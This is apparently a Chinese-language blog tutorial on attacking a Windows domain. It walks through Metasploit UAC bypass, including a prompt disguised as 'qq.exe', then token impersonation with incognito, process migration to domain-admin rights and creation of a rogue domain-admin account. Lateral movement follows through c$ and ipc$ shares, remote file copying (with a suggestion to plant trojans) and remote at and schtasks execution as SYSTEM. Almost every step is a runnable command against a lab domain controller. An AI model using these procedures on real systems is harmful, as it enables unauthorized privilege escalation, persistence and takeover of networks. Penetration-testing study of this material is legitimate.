域安全-UAC提权
需要UAC提权进行的操作:(基本在控制面板)
1.系统的更新
2.增加/修改账户
3.修改UAC设置等
借助msf
1.已经通过木马使目标计算机被控制 成功上线
2.进行UAC提权尝试(失败率比较高)
use exploit/windows/local/bypassuac (多用来进攻32位系统)show optionsset SESSION 1 //具体是几号机器就填相应的数字exploit 开始攻击/run也可以执行//如果攻击成功,会给你一个新的session号进入新的session号getuidgetsystem
ask模块进行uac提权
background 先把木马放到后台use exploit/windows/local/ask 加载ask模块info 查看漏洞信息set SESSION 1 //使用漏洞在1号木马控制的目标上set FILENAME qq.exe //伪装成文件名为qqset LHOST [本地的ip地址] //设置本地监听地址exploit会在用户桌面上弹出一个允许qq启动,用户选择yes,成功getuid //发现还不是systemgetsystem //可以提高到最高
域安全-令牌窃取 纵向移动 横向移动
令牌-token 更类似于web安全中的cookie
伪造令牌 可以实现提权 也就是纵向移动提权方法的一种
核心:kerberos协议
借助工具msf
步骤:
1.木马成功使目标计算机上线
2.进入一个session
use incognitolist_tokens -uimpersonate_token TEST1\\Administrator(这个地方是上面出现的令牌中想要盗用的令牌的名字 反斜杠写两个)//Successfullyshell //即可获得冒用的相应的执行权限whoami
纵向移动(这里介绍一种进程迁移注入的提权方法)
(移动到哪个进程 就可以以哪个进程的名义 做该进程持有者相应权限的事情)
1.首先不论任何手段获得system权限
此时权限是AUTHORITY\SYSTEM 我们需要横向移动到域管理员的权限上
2.
进程迁移提权
![](https://img-blog.csdnimg.cn/a64e289b0bf046ec9e3ffaccd42b46f5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU2ltb25fU21pdGg=,size_20,color_FFFFFF,t_70,g_se,x_16)
migrate [相应进程的pid] //当前进程迁移到其他进程后 权限可能会根据进程权限而改变 可以找高权限的类似 TEST1\Administrator 域管理员的权限get uid //此时已经是域控管理员权限就够了 不能getsystem 否则会失去管理员的权限
![](https://img-blog.csdnimg.cn/06bbd58c81e44ed096613e1d5ea2f95a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU2ltb25fU21pdGg=,size_20,color_FFFFFF,t_70,g_se,x_16)
3.令牌伪造提权: (这一步下才可以执行add_user命令)
(也就是上面的伪造令牌 这里重复介绍一下)
use incognito
list_tokens -u
impersonate_token TEST1\\Administrator
3.后续操作
(纵向移动提权成功以后的横向移动以及后渗透)
#add_user [新用户账号] [新用户密码] -h [域控服务器ip地址]
add_user lyj Test123 -h 192.168.109.136
add_group_user "domain admins" lyj -h 192.168.109.136
shell
net group "domain admins" //只能在域控制器上使用的命令
![](https://img-blog.csdnimg.cn/ec3c0526302a459b93e17e0412980a0d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU2ltb25fU21pdGg=,size_20,color_FFFFFF,t_70,g_se,x_16)
横向移动(纵向移动提权成功以后的情况下的横向移动)
1.使用纵向移动的方法 不论使用了哪种提权方法
这里默认已经获得了TEST1\Administrator 域控管理员权限 并且成功建立了另一个管理员权限的账户lyj
2.默认情况下域控windows会开放c盘的共享
方法1:
进入网络驱动器的映射
![](https://img-blog.csdnimg.cn/1d11624589a74a67961ee5aa8c76398b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU2ltb25fU21pdGg=,size_20,color_FFFFFF,t_70,g_se,x_16)
3.点击完成 登录刚才建立的新的管理员账户
![](https://img-blog.csdnimg.cn/e6466ecb92b046d3a859009e7089b099.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU2ltb25fU21pdGg=,size_19,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/d389ef0a9ed94a0b884acc12caa07505.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU2ltb25fU21pdGg=,size_20,color_FFFFFF,t_70,g_se,x_16)
方法2:命令行操作
net use \\192.168.109.136\c$ "Test123" /user:lyj
net share
net use
dir \\192.168.109.136\c$
type \\192.168.109.136\c$\a.txt
方法2-2:
当对方
开启了135 445端口时可以使用ipc$ 或者管理员什么都没有修改那么可以使用ipc$ 可以使用的权限更高
net use \\192.168.109.136\ipc$ "Test123" /user:lyj
net use
方法2-3:
远程访问(以远程访问进程为例)
tasklist /S 192.168.109.136 /U lyj /P Test123
方法2-4:
在内网被控制的机器的C盘创建一个文本文件a.txt
然后cmd执行命令
可以把本机的文件拷贝到域控电脑C盘上的 这里也可以考虑传木马等 都很轻松了
copy a.txt \\192.168.109.136\c$
方法2-5:计划任务 9点51执行cmd命令并且输出到c盘下的1.txt内
at \\192.168.109.136 9:51PM cmd.exe /c "ipconfig > c:/1.txt"
方法2-6:针对比较新的系统
schtasks /create /s 192.168.109.136 /tn test1 /sc onstart /tr c:/a.bat /ru system /f